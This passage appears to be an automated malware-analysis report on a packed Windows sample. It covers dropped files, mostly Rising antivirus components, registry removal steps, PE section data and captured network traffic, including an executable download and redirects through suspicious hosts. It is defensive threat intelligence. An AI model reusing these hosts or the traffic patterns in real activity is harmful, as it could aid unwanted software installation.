%Program Files%\Rising\RSD\Backup\RAV\RSDK\rscom.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\comx3.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\rsmondef.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\CfgDll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\defmon.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\ravxp.exe (601 bytes)
%Program Files%\Rising\RSD\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt09.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dat (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\mergexml.dll (117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll (4727 bytes)
%Program Files%\Rising\RSD\rsmginfo.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\rslog.dll (25 bytes)
%Program Files%\Rising\RSD\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\comx3.dll (693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rslang.dll (1655 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\ravmon.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\adefmon.mond (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\localopt.dll (2190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mond.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\url.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsdll.dll.dat (601 bytes)
%Program Files%\Rising\RSD\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Custom.xml (775 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSSETUP.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rssqlite.dll (4311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\monrule.dll (211 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\lics936.txt (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll (1254 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys (2740 bytes)
%System%\drivers\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\localopt.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll (3126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll (2054 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mond (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Rising.ico (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscomm.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAVBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsutils.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rstask.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\c[1].aspx (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\procenv.dll (29 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\CLOUDV3.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsStub.exe (1762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\license.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\syslay.dll (316 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt08.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\updater.exe (7115 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\dataups.dat (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (22865 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\ravmaindui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcp90.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcr90.dll (4185 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudwork.dll (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\traywnd.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\Cloudv3.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils.sys (601 bytes)
%Program Files%\Rising\RSD\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\update.xml (164 bytes)
%Program Files%\Rising\RSD\popwndexe.exe (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RsBaseNetWrapper.dll (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\RSMONDEF.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsTray.ico (601 bytes)
%Program Files%\Rising\RSD\Data\RAV\RAV.ini (50 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\update.xml (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\update.xml (164 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\RSDK.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\RAVLOG.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\moncom08.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\_RAV.xml (368 bytes)
%Program Files%\Rising\RSD\RsAppMgr.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\pngdll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmginfo.dll (1115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\RsStub.exe (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAV.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rspalvd.dll (1411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RavSetup.dll (12014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll (2035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bacore.dll (5060 bytes)
%Program Files%\Rising\RSD\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll (4577 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\popwndexe.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsTray.ico (68 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdk.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rspalvd.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.exe (817 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\LICENSE.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.xml (996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dll (1069 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RAV\NetConfig.ini (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\setup.dat (126 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\moncomm.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rscurl.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\12345678.000 (24 bytes)
%Program Files%\Rising\RSD\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudnotifier.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\language.ini (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsBackup.exe (1851 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\hookbase.dll (673 bytes)
%Program Files%\Rising\RSD\CfgDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogAc.bmp (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rscommx2.dll (1281 bytes)
%Program Files%\Rising\RSD\RstoreDll.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Repair.url (155 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\RAV936.xml (515 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsAppMgr.dll (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys (59 bytes)
%Program Files%\Rising\RSD\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravcfg.xml (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsAppMgr.dll (1235 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsSmall.bmp (576 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\install1393485.exe.log (123551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll (1516 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\sysmon.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll (11830 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\MSCRT9.xml (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll (3179 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\mondrv.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsuser.db1 (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll (871 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\mergexml.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll (114 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RSCOMM.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk.dll (3245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.xml (1 bytes)
%Program Files%\Rising\RSD\localopt.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\RAVMAINDUI.xml (1 bytes)
%Program Files%\Rising\RSD\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsuser.db1 (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dat (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll (2897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll (787 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\antipromotionmon.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudqry.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\antipromotionmon.dll (432 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\RAV.ini (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccom.dll (101 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\dataups.dat (207 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3w.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rscombas.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Auto.ini (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\mondef.dll (6282 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\selfmon.dll (89 bytes)
%Program Files%\Rising\RSD\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rscom.dll (452 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll (4492 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RAV.ico (81 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rssrv.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudsta.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (2829 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudnet.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mond.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\popwndexe.exe (126 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\localopt.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg.tmp (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3a.dll (966 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3a.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys (119 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccom.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon_if.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\MONBASEDUI.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\rav936.xml (515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\mondef.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsSmall.bmp (576 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard_if.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt08.dll (1787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll (1199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\dfw.dll (3888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\procenv.dll (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\ravdefdb.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsStub.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\urg[1].htm (112 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsmon.db1 (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsdk.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RstoreDll.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\ravmond.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe (1990 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\ravcfg.xml (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Repair.url (155 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RSDTRAY" = "%Program Files%\Rising\RSD\popwndexe.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 1183744 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 1187840 | 20480 | 19968 | 5.41054 | 0437776d67d96306722fa79af85af88b |
.rsrc | 1208320 | 28672 | 25600 | 4.38322 | f5640d017a00b32df01ad9febdbde008 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 131
Connection: Keep-Alive
.#4H.......W.>...............................................................frrfaa)vyyifk.!k.f|.{tr8IHJXXriqLNCG......OSI-./012345
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008542120341062666110713
Server: Apache
tracecode: 00008542120341062666110713
Set-Cookie: BAIDUID=32F3C5706F8B2402545910D9A50FD25A:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive
.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00016772320341062666110713
Server: Apache
tracecode: 00016772320341062666110713
Set-Cookie: BAIDUID=69DAC83DF6D595A3CBDF2100CACB5A99:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /t/font_1415073294_4967172.eot? HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: at.alicdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 18124
Connection: keep-alive
Date: Fri, 07 Nov 2014 08:45:51 GMT
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=31557600
ETag: "FA439E838DACE2C479FFB8A09AA20DC4"
Last-Modified: Tue, 04 Nov 2014 03:54:54 GMT
x-oss-request-id: 545C86BFC642146A2828D1BE
Via: cache15.l2de1[0,200-0,H], cache9.l2de1[0,0], cache10.ru1[0,200-0,H], cache8.ru1[2,0]
Age: 31522441
X-Cache: HIT TCP_HIT dirn:9:460901958
X-Swift-SaveTime: Fri, 03 Apr 2015 19:31:55 GMT
X-Swift-CacheTime: 18818036
Timing-Allow-Origin: *
<<< skipped >>>
GET /pca3-g5.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "2235a72ff18d351e39c5c63221752775:1442874344"
Last-Modified: Mon, 21 Sep 2015 22:25:43 GMT
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Length: 533
Connection: keep-alive
Content-Type: application/pkix-crl
<<< skipped >>>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive
.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00117694860581376522110713
Server: Apache
tracecode: 00117694860581376522110713
Set-Cookie: BAIDUID=2C7B1E2C3C0DA057D1ED518AD3390542:FG=1; expires=Sun, 06-Nov-16 05:00:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe?mkey=563da3bbda60d437&f=1224&p=.exe HTTP/1.1
Host: 203.205.148.185
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: CDN_NWS_4.2.1
Connection: keep-alive
Date: Sat, 07 Nov 2015 04:59:59 GMT
Cache-Control: max-age=600
Expires: Sat, 07 Nov 2015 05:09:59 GMT
Last-Modified: Wed, 13 May 2015 09:18:00 GMT
Content-Type: application/octet-stream
Content-Length: 1489144
X-Cache-Lookup: Hit From Disktank
<<< skipped >>>
GET /u.php?id=89 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.shipinbus.com
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sat, 07 Nov 2015 12:58:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.28
Location: hXXp://VVV.meiheitou.com/?89-sd--ant-
GET /cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xui.ptlogin2.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: keep-alive
Keep-Alive: timeout=50, max=1024
Server: QZHTTP-2.38.20
Date: Sat, 07 Nov 2015 05:00:29 GMT
P3P: CP="CAO PSA OUR"
Cache-Control: max-age=604800
